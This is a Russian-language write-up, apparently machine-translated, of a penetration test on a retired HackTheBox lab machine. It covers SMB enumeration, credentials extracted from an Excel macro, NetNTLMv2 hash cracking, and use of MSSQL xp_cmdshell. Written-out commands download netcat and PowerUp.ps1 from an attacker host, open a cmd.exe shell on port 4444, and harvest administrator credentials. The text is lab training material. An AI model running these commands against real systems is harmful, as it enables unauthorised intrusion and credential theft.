Привет, Хабр! В этой статье вы узнаете о методе атаки на удаленный сервер с использованием возможностей MsSQL, создании обратной оболочки для подключения к системе и примере эксплуатации плохо настроенной групповой политики в Windows. Ниже под катом мы расскажем о моем опыте прохождения лабораторной машины.
запросчик на портале взломать коробку .
Для тех, кто не знает, что такое hackthebox, это портал, где можно проверить свои навыки пентестинга на практике, есть CTF-задачи и настоящие лабораторные машины.
Отказ от ответственности В правилах сервиса сказано: « Не рассказывайте другим участникам, как вы взломали каждую машину.
Сюда входит генерация пригласительного кода и все задачи.
" Но поскольку эта машина больше не активна и хранится в " Устаревшие машины ", доступ к нему имеют только VIP-члены.
Сбор информации
Начнем разведку со сканирования портов с помощью nmap.nmap –sC –Pn –A 10.10.10.125
Перечислим найденные порты.
Перечислить 139/445/tcp (smb)
Давайте воспользуемся утилитой smbclient для доступа к ресурсам SMB-сервера.
smbclient –L //10.10.10.125
Перебрав все ресурсы, находим в каталоге Reports файл «Currency Volume Report.xlsm».
Если вы откроете этот файл с помощью стандартного Microsoft Excel, на первый взгляд он покажется совершенно пустым.
Проанализируем файл с помощью утилиты пешеходная дорожка , который поможет вам просмотреть встроенные файлы документа xlsm. 
В выводе binwalk мы обнаружили несколько интересных файлов, содержащихся в xlsm.
Используя флаг –e, мы распаковываем его.
binwalk –e Currency\ Volume\ Report.xlsm
Теперь воспользуемся утилитой струны для вывода печатных символов.
Пролистав файлы, находим интересные данные в vbaProject.bin. Похоже, мы нашли учетные данные для сервера mssql. 
Подведем итоги полученной на данный момент информации:
- Мы знаем, что сервер mssql работает на порту 10.10.10.125:1433;
- У нас есть учетные данные пользователя сервера mssql.
python mssqlclient.py QUERIER/reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth
Получаем доступ к MsSQL. 
Перечислить MSSQL
Перечислим полезную для нас информацию с помощью команд из статьи .
После выполнения SQLi мы получаем хэш пароля пользователя mssql-svc. 
Чтобы получить пароль в явном виде, вам необходимо взломать его любым удобным для вас инструментом.
-
john --format=netntlmv2 hash.txt
-
hashcat -m 5600 -a 3 hash.txt
Подключитесь к SQL с новыми кредитными учетными данными.
python mssqlclient.py QUERIER/mssql-svc:'corporate568'@10.10.10.125 -windows-auth
Права этого пользователя позволяют нам выполнять xp_cmdshell О xp_cmdshell MsSQL поставляется с большим набором расширенных хранимых процедур.
Самый интересный из них — xp_cmdshell. Он обеспечивает доступ к командной строке операционной системы.
Получаем обратную оболочку
Пытаемся получить шелл через netcat, для этого нам необходимо загрузить его на атакуемый сервер.
Перейдите в каталог на нашем компьютере, где находится netcat, и запустите: python –m SimpleHTTPServer
В оболочке mssql для загрузки netcat (nc.exe) на удаленный сервер выполните команду powershell, указав путь сохранения.
xp_cmdshell "powershell.exe Invoke-WebRequest " http://10.10.x.x:8000/nc.exe " –
OutFile "C:\Users\mssql-svc\Desktop\nc.exe" "
Запустите netcat для прослушивания порта 4444. xp_cmdshell "powershell C:/Users/mssql-svc/Desktop/nc.exe -l -p 4444 -e cmd.exe"
Запускаем на своей стороне netcat, указав ip и порт атакуемого сервера и получаем шелл.
nc 10.10.10.125 4444
Давайте запустим скрипт из PowerShellMafia для повышения привилегий.
powershell.exe IEX (New-Object Net.WebClient).
DownloadString(\" http://10.10.x.x:8000/PowerUp.ps1\ "); Invoke-AllChecks
В результате запуска скрипта мы получили учетные данные администратора.
Заходим на smb-ресурсы с новыми учетными данными и разрешениями.
Убираем флаг root.txt. Победа!
Теги: #информационная безопасность #пентест #hackthebox
-
Rambler Media Возглавил Выходец Из Yahoo
19 Oct, 24 -
Восьмибитные Шутки 2
19 Oct, 24 -
Открытка Простому Сисадмину
19 Oct, 24 -
News Outdoor Russia Купила Кусок Adme.ru
19 Oct, 24 -
Зубная Паста И Царапины На Диске
19 Oct, 24 -
Вдохновляйтесь С Inspireme
19 Oct, 24 -
Не Просто Джип ;)
19 Oct, 24
